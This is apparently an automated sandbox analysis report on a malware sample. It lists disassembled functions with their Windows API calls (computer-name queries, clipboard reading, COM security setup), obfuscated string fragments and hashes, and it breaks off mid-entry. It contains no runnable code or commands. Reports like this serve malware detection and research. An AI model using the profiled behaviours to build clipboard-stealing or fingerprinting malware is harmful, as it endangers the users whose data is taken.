Function 0042FFF2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 004300BB

Strings

obfm, xrefs: 00430029

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID: ComputerName
String ID: obfm
API String ID: 3545744682-167179971
Opcode ID: 2d39339703d7d6942d10a18f28fd41cea763b020c73a7772921b4102d844e6c9
Instruction ID: 9ddf431f3ac3323bf891e7c6a8bfda5f3351cea094600eebcb125b45668b26b5
Opcode Fuzzy Hash: 2d39339703d7d6942d10a18f28fd41cea763b020c73a7772921b4102d844e6c9
Instruction Fuzzy Hash: 5D21DE741087C18AE7358B25C8247EBBBE4AF9B314F084A9DC0D99B3A2DB3584058B67

Function 0042FFF0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 004300BB

Strings

obfm, xrefs: 00430029

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID: ComputerName
String ID: obfm
API String ID: 3545744682-167179971
Opcode ID: 197eb79c8aa807e9eaa8299b63d5308e5771501b80847c43b69e18b57bb8ca84
Instruction ID: eea5da754b7801ce8673b0e7f5ab476bf562d26687a783825d78ab5bac27d604
Opcode Fuzzy Hash: 197eb79c8aa807e9eaa8299b63d5308e5771501b80847c43b69e18b57bb8ca84
Instruction Fuzzy Hash: 47119AB51097D08BE7358B25C8247EBBBE4AFCA324F084A6DC1D99B2A1DB7584048B57

Function 0040D265 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040D277

Strings

^;, xrefs: 0040D287

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID: InitializeSecurity
String ID: ^;
API String ID: 640775948-2608935831
Opcode ID: 41d5104edc8d365bac51fef2626ba2bb46324f0040d23d77477a4251dd28630f
Instruction ID: 16577ddab5f487c288831e5af8e4581908f8c140660b0e26d9cb5daca3acdebd
Opcode Fuzzy Hash: 41d5104edc8d365bac51fef2626ba2bb46324f0040d23d77477a4251dd28630f
Instruction Fuzzy Hash: B3D0C9383D830077F2788B18AC53F1032105302F55F300328B326FE6D1CAD07555860C

Function 0042FE9D Relevance: 3.1, APIs: 2, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 0042FEC5
GetComputerNameExA.KERNELBASE(00000006,FF1A1432,00000100), ref: 0042FFB1

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID:
API String ID: 2904949787-0
Opcode ID: 9904b7a1f6da62e9277e9f5963996363c50506351de6ec4a7992345341cc8506
Instruction ID: fbd3446c46f992849775b6ec988e74e5085265d45abf2ad28f5507aafc7518d8
Opcode Fuzzy Hash: 9904b7a1f6da62e9277e9f5963996363c50506351de6ec4a7992345341cc8506
Instruction Fuzzy Hash: 6E31077661D7A18FEB35CF34D8547ABBBE1ABC6300F89896ED4C857251CB7808058745

Function 0042FE9B Relevance: 3.1, APIs: 2, Instructions: 86COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 0042FEC5
GetComputerNameExA.KERNELBASE(00000006,FF1A1432,00000100), ref: 0042FFB1

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID:
API String ID: 2904949787-0
Opcode ID: ff0a936182c161f67281d6bff1752a11a9cd2e51e3480926133a88542210346f
Instruction ID: b8c2b668b0f230dd7e9d6ee7f0da42670a6416ed1980958067f2fa697bc40140
Opcode Fuzzy Hash: ff0a936182c161f67281d6bff1752a11a9cd2e51e3480926133a88542210346f
Instruction Fuzzy Hash: 072104766197618FEB34CF24D95479BBBE1ABC6300F89893ED4C897255CA7808058786

Function 00440D8E Relevance: 3.0, APIs: 2, Instructions: 8COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00440D8E
GetForegroundWindow.USER32 ref: 00440D94

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: ec8a0aa9ed1b6c2bb35c4e689d564a48f715b52f24341e10cbace835d1017fe9
Instruction ID: 9c3e06892b4063dfc341aad47a9a66b79a61a7df34fe2fd00d320b6ca573bad9
Opcode Fuzzy Hash: ec8a0aa9ed1b6c2bb35c4e689d564a48f715b52f24341e10cbace835d1017fe9
Instruction Fuzzy Hash: DEC04C3D1545408BC308CB24EEDB4243764E707249319043CD657C2665CF2095108A5D

Function 0042FE38 Relevance: 1.6, APIs: 1, Instructions: 86COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000006,FF1A1432,00000100), ref: 0042FFB1

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: f64fbde569213be8747cd35c3b832efceac08f18d9759ce9b182e435daa3db25
Instruction ID: e850102e12a083ea3cc6ff171690d3dead1f7c61c7dc2f1441a0df1f784eddde
Opcode Fuzzy Hash: f64fbde569213be8747cd35c3b832efceac08f18d9759ce9b182e435daa3db25
Instruction Fuzzy Hash: 9921377661D7618FEB34CF34D95479BBBE1ABC5300F898A3ED8C857255CB7808058742

Function 0043ABAA Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 0043ABCA

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-0
Opcode ID: f52e9b756dda7fe44cbf0a12b47b269150cbcc89303115ae908044e936585026
Instruction ID: 1de69457ec2a3437d1ca58804905589deffbe3c660f6e2878b36aecfd1a33881
Opcode Fuzzy Hash: f52e9b756dda7fe44cbf0a12b47b269150cbcc89303115ae908044e936585026
Instruction Fuzzy Hash: 94210131A055918FDB44CB3CC851769BFB2BB9A300F0DC2D9D585DB386DA389885CB56

Function 00440830 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,00000001,521D1CD8,?,?,?,?,?,?,016273B0,521D1CD8,00000001,?,00415144,00000002), ref: 004408AE

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: fc8f7e537acf98643de4aa27e6a58444f3e26e2ab4e82aece79710c41409d385
Instruction ID: 0ed3c54082eb6ea79bac8df67f91287d766d328dec2a6e5296587ae4fc093f81
Opcode Fuzzy Hash: fc8f7e537acf98643de4aa27e6a58444f3e26e2ab4e82aece79710c41409d385
Instruction Fuzzy Hash: 81F0DCBA509210EBD2006B25BC42E27376CEFCB794F110479E60947222D738EC00C6FA

Function 0043671A Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00436762

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: c638c1d810109a002edac6e9828d5df0b407fdf27abc80bca522e244c346f6d1
Instruction ID: 578e911aee2e9bcccc0d74aa7fdad65ef25e51f15e12c8d7e017d5a92bbbde9e
Opcode Fuzzy Hash: c638c1d810109a002edac6e9828d5df0b407fdf27abc80bca522e244c346f6d1
Instruction Fuzzy Hash: 67F0DAB45087029FE314DF68D5A8B17BBE1FB89344F11891CE4A68B390C7B5E548CF82

Function 00434610 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00434656

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 44e0afec353166eaf27b972f02e033f6ca2b4ba2606c209e0056313cb07c2cc6
Instruction ID: 708079d70bf4c30aa6fa2b4724cee6f8dc44687d082556985e2443c9bef19ba2
Opcode Fuzzy Hash: 44e0afec353166eaf27b972f02e033f6ca2b4ba2606c209e0056313cb07c2cc6
Instruction Fuzzy Hash: 8AF098B4108701CFE311DF29C1A471ABBF0FB85308F10881CE5958B3A0C7B6A949CF82

Function 0040D230 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0040D243

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 9c7586568337e5876ad075314be65e5e02b72ea53be715a7b6b6408b1f4523ca
Instruction ID: 442fad1a8397455b36327e5bb836b596eb8bdb13d688a4e8a40d93b30d210838
Opcode Fuzzy Hash: 9c7586568337e5876ad075314be65e5e02b72ea53be715a7b6b6408b1f4523ca
Instruction Fuzzy Hash: 83D0A73565814467E308B73DDC56F26369D9703725F100239F663CA2D2EE246811C2FE

Function 0043F160 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,00000000,004150BB,00000000), ref: 0043F180

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: e5c65b4fb206c011d0a03cab76ae6eb03c2cb4b4f821cdc8251034998cf1e2ef
Instruction ID: 41e08f1fce8f32751dade50590bfb0fdd081827724fab35195612dbcdcfde7d1
Opcode Fuzzy Hash: e5c65b4fb206c011d0a03cab76ae6eb03c2cb4b4f821cdc8251034998cf1e2ef
Instruction Fuzzy Hash: E8D0C931415522EBD6102F28BC05BC73A99DF4A262F0748A5F4406A075C725ECD1CAD8

Function 0043F140 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,?,00408C9F,C`AF), ref: 0043F150

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4e68cb76ce7e54d979cca98319f8ac2bd6cbc67678615ead7313adb646fb88d0
Instruction ID: f13b652477accb2e6d6609722ec42f34bebadc1b0e97b454c8fb2987b16dedba
Opcode Fuzzy Hash: 4e68cb76ce7e54d979cca98319f8ac2bd6cbc67678615ead7313adb646fb88d0
Instruction Fuzzy Hash: 23C09B31045520ABD7102B15FC05FCB3F55FF45355F150055F44467071C761ACC2C6D8

Non-executed Functions

Function 0041E5D0 Relevance: 77.4, Strings: 61, Instructions: 1164COMMON

Download Yara Rule

Strings

6, xrefs: 0041EABA
6, xrefs: 0041E841
=, xrefs: 0041EAA1
m, xrefs: 0041EACF
%, xrefs: 0041E9F7
T, xrefs: 0041EC97
k, xrefs: 0041E9D4
N, xrefs: 0041E8EC
I, xrefs: 0041EA56
s, xrefs: 0041EBBF
9, xrefs: 0041E83C
o, xrefs: 0041E9CF
F, xrefs: 0041EB27
1, xrefs: 0041EA8D
6, xrefs: 0041EA92
B, xrefs: 0041EB0F
/, xrefs: 0041EA10
^, xrefs: 0041EB47
k, xrefs: 0041E9DE
0, xrefs: 0041EA3D
, xrefs: 0041EA88
4, xrefs: 0041EAB0
I, xrefs: 0041EB37
?, xrefs: 0041EAB5
^, xrefs: 0041EAEF
u, xrefs: 0041EBC7
J, xrefs: 0041EAD7
', xrefs: 0041EADF
], xrefs: 0041ECB7
4, xrefs: 0041E837
r, xrefs: 0041EA51
;, xrefs: 0041EA60
B, xrefs: 0041EB1F
P, xrefs: 0041EC9F
", xrefs: 0041E869
., xrefs: 0041EB2F
V, xrefs: 0041ECA7
|, xrefs: 0041E8E4
#, xrefs: 0041F65C
9, xrefs: 0041F654
[, xrefs: 0041E9C0
C, xrefs: 0041EB17
;, xrefs: 0041EAA6
), xrefs: 0041EAAB
B, xrefs: 0041EB3F
', xrefs: 0041F189
;, xrefs: 0041EABF
e, xrefs: 0041EAF7
3, xrefs: 0041E846
, xrefs: 0041EA9C
V, xrefs: 0041ECAF
k, xrefs: 0041E9C5
}, xrefs: 0041EA1F
?, xrefs: 0041EA6A
{, xrefs: 0041EA97
$, xrefs: 0041E9E8
5, xrefs: 0041EA79
0, xrefs: 0041E87D
R, xrefs: 0041E9E3
_, xrefs: 0041E9CA
T, xrefs: 0041EB07

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: $ $"$#$$$%$'$'$)$.$/$0$0$1$3$4$4$5$6$6$6$9$9$;$;$;$=$?$?$B$B$B$C$F$I$I$J$N$P$R$T$T$V$V$[$]$^$^$_$e$k$k$k$m$o$r$s$u${$|$}
API String ID: 0-2842158168
Opcode ID: 2a3d2c23ae89a89602bddc417ca9b2811490d034afd36fc2fc35ab7ee23e4bb2
Instruction ID: be878a6f4849a8a407256fbfa668798102421ee1a68daaabece180e16d77482e
Opcode Fuzzy Hash: 2a3d2c23ae89a89602bddc417ca9b2811490d034afd36fc2fc35ab7ee23e4bb2
Instruction Fuzzy Hash: 60B2807160C7C18BC3358A3C88543EFBBD16B96324F184A6DE4E98B3D2D679884AC757

Function 00426B30 Relevance: 42.0, Strings: 33, Instructions: 705COMMON

Download Yara Rule

Strings

{B, xrefs: 00427771
GwCq, xrefs: 00427400
wD, xrefs: 00426E34
o&i, xrefs: 004273F2
>[]e, xrefs: 004273DD
+C8M, xrefs: 004273B3
1G.A, xrefs: 004273AC
m-~/, xrefs: 00426CC8
k8m>, xrefs: 00426EBA
E3K=, xrefs: 00427397
+%, xrefs: 004272BC
n<j", xrefs: 00426FBC
/), xrefs: 004272B2
#O;I, xrefs: 004273BA
)_3Y, xrefs: 004273D6
f0v6, xrefs: 00426EA6
p)r+, xrefs: 00426CBE
@~B, xrefs: 00426B75, 00426BC5, 00427545, 00427E0A, 00427E2E, 00427E37
;5, xrefs: 00427294
}+I5, xrefs: 00427389
j;6E, xrefs: 004273A5
U?\9, xrefs: 0042739E
CsM}, xrefs: 00427407
&S+], xrefs: 004273CF
ZkHu, xrefs: 004273F9
n<j", xrefs: 00426EC4
Ug_a, xrefs: 004273E4
r p&, xrefs: 00426ECE
J7D1, xrefs: 00427390
_c/m, xrefs: 004273EB
|(o., xrefs: 00426EE2
+W,Q, xrefs: 004273C8
JY, xrefs: 00426E3B

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: o&i$#O;I$&S+]$)_3Y$+C8M$+W,Q$1G.A$>[]e$@~B$CsM}$E3K=$GwCq$J7D1$JY$U?\9$Ug_a$ZkHu$_c/m$f0v6$j;6E$k8m>$m-~/$n<j"$n<j"$p)r+$r p&$wD$|(o.$}+I5$+%$/)$;5${B
API String ID: 0-1277758745
Opcode ID: 5f03a08c2e0e48770e32e0e70bbf5965019fee2d47331fee6e24173ab340c7e7
Instruction ID: 9e3af9a1c140990d959a3f04eeb6c0b04d853c3f63cc8e770c127bff6586c8a4
Opcode Fuzzy Hash: 5f03a08c2e0e48770e32e0e70bbf5965019fee2d47331fee6e24173ab340c7e7
Instruction Fuzzy Hash: 0A6288B4A00216CFE758CF25D980799BBB1FF06304F6892ACC559AF752D7369882CF84

Function 00437140 Relevance: 28.1, APIs: 6, Strings: 10, Instructions: 118clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00437150
GetClipboardData.USER32 ref: 0043716B
GlobalLock.KERNEL32 ref: 00437184
GlobalUnlock.KERNEL32 ref: 004372B2
CloseClipboard.USER32 ref: 004372BF

Strings

., xrefs: 00437234
], xrefs: 0043721B
z, xrefs: 0043723E
h, xrefs: 0043722A
j, xrefs: 00437216
k, xrefs: 00437220
g, xrefs: 00437243
X, xrefs: 00437225
i, xrefs: 00437239
[, xrefs: 0043722F

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock
String ID: .$X$[$]$g$h$i$j$k$z
API String ID: 1006321803-1585933158
Opcode ID: 10a3359804d5ff38a6a4b23bfb057e0cb072877bef99ea573896f8921aaef603
Instruction ID: aedd2ff572e64b49135a5f072c6a9a4ea20e9c49d62d6bde14b945e9b535fb98
Opcode Fuzzy Hash: 10a3359804d5ff38a6a4b23bfb057e0cb072877bef99ea573896f8921aaef603
Instruction Fuzzy Hash: 4A419DB110C7818ED311EF78948836FBFE1AB96318F05096EE4D597382C67E854D87A7

Function 00411CC5 Relevance: 18.1, APIs: 1, Strings: 9, Instructions: 564COMMON

Download Yara Rule

Strings

C, xrefs: 00412273
C, xrefs: 00411CD3
0, xrefs: 0041226E
Z, xrefs: 00411F7A
x, xrefs: 00412311
h, xrefs: 004120A4
T, xrefs: 00412316
', xrefs: 00412145
(, xrefs: 00412269

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: '$($0$C$C$T$Z$h$x
API String ID: 0-3884181529
Opcode ID: c241dbaf3bb263c6d98446dd849fa14887e34092336295a52623ee2db798e61c
Instruction ID: b86dc80f8cc40804af3232fe22323fc27848872ea1f70f4952bee5033056712d
Opcode Fuzzy Hash: c241dbaf3bb263c6d98446dd849fa14887e34092336295a52623ee2db798e61c
Instruction Fuzzy Hash: 1B22E47260C7808BD3249B38C5943AFBBD1ABD5324F194A2EE5D9D73C1DB7889418B47

Function 00428740 Relevance: 15.5, Strings: 12, Instructions: 484COMMON

Download Yara Rule

Strings

]/_), xrefs: 00428861
y;L5, xrefs: 00428849
:_-Y, xrefs: 00428881
owrq, xrefs: 00428815, 004289C4
s, xrefs: 00428C20
O7F1, xrefs: 00428851
O3H-, xrefs: 00428859
P#!], xrefs: 00428879
.K+E, xrefs: 004288AC
T+H%, xrefs: 00428869
K?y9, xrefs: 00428841
I'a!, xrefs: 00428871

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: .K+E$:_-Y$I'a!$K?y9$O3H-$O7F1$P#!]$T+H%$]/_)$owrq$s$y;L5
API String ID: 0-1156837168
Opcode ID: 6553e4bc340c84b9eb14b4262635dbe7335b8895563d100548fe3976aaf18d19
Instruction ID: 1dfab4b4f60f0312ee4986e27dd8e9e7c0b12bc0c877233b3782ba882d60a67e
Opcode Fuzzy Hash: 6553e4bc340c84b9eb14b4262635dbe7335b8895563d100548fe3976aaf18d19
Instruction Fuzzy Hash: B6F1DCB5609340DFE324CF25E89172FB7E1FBD6304F44882DE5C58A2A1EB74A805CB5A

Function 00431C20 Relevance: 14.7, Strings: 11, Instructions: 964COMMON

Download Yara Rule

Strings

Z,C, xrefs: 00432877
}7C, xrefs: 0043262D
DLC, xrefs: 00432643
Z,C, xrefs: 0043288D
E7C, xrefs: 00432721
n:C, xrefs: 00432599
tFC, xrefs: 0043266F
QGC, xrefs: 00432979
%7C, xrefs: 004326C1
FC, xrefs: 00431C34
>CC, xrefs: 0043284B

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: %7C$>CC$DLC$E7C$QGC$Z,C$Z,C$n:C$tFC$}7C$FC
API String ID: 0-939059920
Opcode ID: b81ed88c3744cbd53b7023b4121ec38d0752b7b15f3b7b78cfcd46e6fd5eb5b2
Instruction ID: 5117f767eaa293feff76bc5a2927639859328b7c9cd17494f6175627904aa5d9
Opcode Fuzzy Hash: b81ed88c3744cbd53b7023b4121ec38d0752b7b15f3b7b78cfcd46e6fd5eb5b2
Instruction Fuzzy Hash: E4926DB1614B409FE365CF3DCC55793BFE6AB4A300F04896DA0AEC7786D778A5018B16

Function 00409AD0 Relevance: 12.9, Strings: 10, Instructions: 387COMMON

Download Yara Rule

Strings

2C63EE89F9A03A3633642DA608956FF1, xrefs: 00409B8C
115;, xrefs: 00409D2F
?<, xrefs: 00409ED0
115;, xrefs: 00409B86, 00409BC5, 00409B75
?i?, xrefs: 00409C68
!, xrefs: 00409E07
Mi?, xrefs: 00409CB2
YD, xrefs: 00409BE4
_, xrefs: 00409D0F
5, xrefs: 00409C61

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: !$115;$115;$2C63EE89F9A03A3633642DA608956FF1$5$?<$?i?$Mi?$_$YD
API String ID: 0-3910429862
Opcode ID: 1b5223bfb25c7fe2cfb7e9ee0869a4c5175e6a4ed3ed8af45d2278d78120ae05
Instruction ID: fa08be78c83da20720a05a0cfbe3e0b6fbc7da32ec12be7a7771a37be85465da
Opcode Fuzzy Hash: 1b5223bfb25c7fe2cfb7e9ee0869a4c5175e6a4ed3ed8af45d2278d78120ae05
Instruction Fuzzy Hash: EAB1ADB154C3409BE714DF26D851B6BBBE1EFC2314F14892DE4D18B382D779890ACB9A

Function 0041870B Relevance: 11.6, APIs: 3, Strings: 3, Instructions: 1124COMMON

Download Yara Rule

Strings

<$Sc, xrefs: 00418CB3
e$Sc, xrefs: 00418D30
B, xrefs: 00418A1C

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: <$Sc$B$e$Sc
API String ID: 0-558430498
Opcode ID: 83fe2b28591e77820c2a5d6001e40703ddf9535903dbfdb32caef196d3c1b80c
Instruction ID: a1873f99cd1242a2590e9742ddc1e036e92e1d2cb8a024b0c59c5dea1b1b02fd
Opcode Fuzzy Hash: 83fe2b28591e77820c2a5d6001e40703ddf9535903dbfdb32caef196d3c1b80c
Instruction Fuzzy Hash: B67239716083518BD724CF28C8917ABB7E2FFD5314F188A6EE4C99B391DB388945CB46

Function 0043B3D0 Relevance: 10.3, Strings: 8, Instructions: 312COMMON

Download Yara Rule

Strings

~, xrefs: 0043B521
&, xrefs: 0043B64C
@, xrefs: 0043B656
P, xrefs: 0043B651
X, xrefs: 0043B3FA
s, xrefs: 0043B512
X, xrefs: 0043B478
J, xrefs: 0043B65B

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: &$@$J$P$X$X$s$~
API String ID: 0-3380057976
Opcode ID: c6b4e446e3944338f3872d734502533133df34c924da4037aa6ccfb615a18edb
Instruction ID: 0b1cced20ad20c79e25f51148f3bff26dd4f5e919cd98e92f91ced9e5d518fbe
Opcode Fuzzy Hash: c6b4e446e3944338f3872d734502533133df34c924da4037aa6ccfb615a18edb
Instruction Fuzzy Hash: 5AC1E37260C7D04AD325853C884435BAFC29BE7324F2D8B6EE6E5C73D2D66988068397

Function 00429570 Relevance: 9.3, Strings: 7, Instructions: 510COMMON

Download Yara Rule

Strings

t2u~, xrefs: 00429B88
lSXp, xrefs: 00429B80
f, xrefs: 00429582
$Ca_, xrefs: 00429B70
s, xrefs: 00429B90
ZU*J, xrefs: 00429B78
Zcca, xrefs: 00429B68

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: $Ca_$ZU*J$Zcca$f$lSXp$s$t2u~
API String ID: 0-1492853437
Opcode ID: 31d7b4940fb1cd638bc083a3186c21e80f307bd36dd3f8a973313de6b5062c83
